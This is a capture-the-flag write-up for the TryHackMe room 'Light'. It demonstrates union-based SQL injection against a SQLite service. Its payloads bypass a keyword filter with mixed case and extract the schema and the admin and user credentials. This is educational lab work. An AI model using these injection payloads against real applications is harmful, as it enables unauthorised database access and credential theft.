☕
Writeups
TryHackMeHackTheBoxReferralsDonateLinkedIn
  • Writeups
  • TryHackme
    • 2025
      • Hackfinity Battle Vault
      • Security Footage
      • Ledger
      • Moebius
      • Mayhem
      • Robots
      • Billing
      • Crypto Failures
      • Rabbit Store
      • Decryptify
      • You Got Mail
      • Smol
      • Light
      • Lo-Fi
      • Silver Platter
    • 2024
      • Advent of Cyber '24 Side Quest
        • T1: Operation Tiny Frostbite
        • T2: Yin and Yang
        • T3: Escaping the Blizzard
        • T4: Krampus Festival
        • T5: An Avalanche of Web Apps
      • The Sticker Shop
      • Lookup
      • Mouse Trap
      • Hack Back
      • SeeTwo
      • Whiterose
      • Rabbit Hole
      • Mountaineer
      • Extracted
      • Backtrack
      • Brains
      • Pyrat
      • K2
        • Base Camp
        • Middle Camp
        • The Summit
      • The London Bridge
      • Cheese CTF
      • Breakme
      • CERTain Doom
      • TryPwnMe One
      • Hammer
      • U.A. High School
      • IronShade
      • Block
      • Injectics
      • DX2: Hell's Kitchen
      • New York Flankees
      • NanoCherryCTF
      • Publisher
      • W1seGuy
      • mKingdom
      • Airplane
      • Include
      • CyberLens
      • Profiles
      • Whats Your Name?
      • Capture Returns
      • TryHack3M
        • TryHack3M: Burg3r Bytes
        • TryHack3M: Bricks Heist
        • TryHack3M: Sch3Ma D3Mon
        • TryHack3M: Subscribe
      • Creative
      • Bypass
      • Clocky
      • El Bandito
      • Hack Smarter Security
      • Summit
      • Chrome
      • Exfilibur
      • Breaking RSA
      • Kitty
      • Reset
      • Umbrella
      • WhyHackMe
      • Dodge
    • 2023
      • Advent of Cyber '23 Side Quest
        • The Return of the Yeti
        • Snowy ARMageddon
        • Frosteau Busy with Vim
        • The Bandit Surfer
      • Stealth
      • AVenger
      • Dreaming
      • DockMagic
      • Hijack
      • Bandit
      • Compiled
      • Super Secret TIp
      • Athena
      • Mother's Secret
      • Expose
      • Lesson learned?
      • Grep
      • Crylo
      • Forgotten Implant
      • Red
    • Obscure
    • Capture
    • Prioritise
    • Weasel
    • Valley
    • Race Conditions
    • Intranet
    • Flip
    • Cat Pictures 2
    • Red Team Capstone Challenge
      • OSINT
      • Perimeter Breach
      • Initial Compromise of Active Directory
      • Full Compromise of CORP Domain
      • Full Compromise of Parent Domain
      • Full Compromise of BANK Domain
      • Compromise of SWIFT and Payment Transfer
  • HackTheBox
    • 2025
      • Certified
    • 2024
      • BoardLight
      • Crafty
      • Devvortex
      • Surveillance
      • Codify
      • Manager
      • Drive
      • Zipping
    • 2023
      • Topology
Powered by GitBook
On this page

Was this helpful?

  1. TryHackme
  2. 2025

Light

Welcome to the Light database application! - by hadrian3689

PreviousSmolNextLo-Fi

Last updated 4 months ago

Was this helpful?

The following post by 0xb0b is licensed under


For this challenge, we will skip the Nmap scan. The room description already asks us to connect to port 1337. We also get a user to start with. The service on 1337 could be the aforementioned database application called Light.

Since this is a database challenge, we try the simplest SQL Injection payload '. And we get an error returned. The service might be vulnerable to SQL Injection. The error message tells us about an unrecognized token in ''' LIMIT 30". We may have broken the enclosed string by ', which led to this error.

Now, let's try to get more information using a UNION SELECT injection. But it errors with our comment we used.

' UNION SELECT 1 -- -

Alternately, we use # to comment, and do not receive a similar error as before. But there are words that get blocked. It might be UNION and SELECT.

' UNION SELECT 1 #

We switch between capitalized and non capitalized characters. But still get an error. Might be the SELECT statement too.

' UniOn SELECT 1 #

After applying the same technique to the SELECT statement, we now get a different error. The token # is not recognized.

' UniOn SeLeCt 1 #

We URL encode the # character, but that does not help either. But we receive another error regarding the ' character.

' UniOn SeLeCt 1 %23

So maybe there is a statement like this, that gets broken with inserting a ':

SELECT * FROM users WHERE username = '{user_input}' LIMIT 30; 

Leading to:

SELECT * FROM users WHERE username = ''' LIMIT 30;

We close our statement with another ', and now have a successful UNION based injection.

' UniOn SeLeCt 1 '

Next, we query for the version, to determine which DBMS is used to craft the payloads to retreive the data from the database. It is a SQLite Database version 3.31.1.

' UniOn SeLeCt @@version '
' UniOn SeLeCt version() '
' UniOn SeLeCt sqlite_version() '

Next we query from the sqlite_master to get the database structure. There is a admintable and a usertable.

' UniOn SeLeCt group_concat(sql) FROM sqlite_master '

We query username and password from the usertable, but do not find the asked information:

' UniOn SeLeCt group_concat(username) FROM usertable '
' UniOn SeLeCt group_concat(password) FROM usertable '

Next, we query for the username and password from the admintable and do find the username, password and the asked flag.

' UniOn SeLeCt group_concat(username) FROM admintable '
' UniOn SeLeCt group_concat(password) FROM admintable '
CC BY 4.0
LightTryHackMe
Logo
PayloadsAllTheThings/SQLite Injection.md at master · swisskyrepo/PayloadsAllTheThingsGitHub
Logo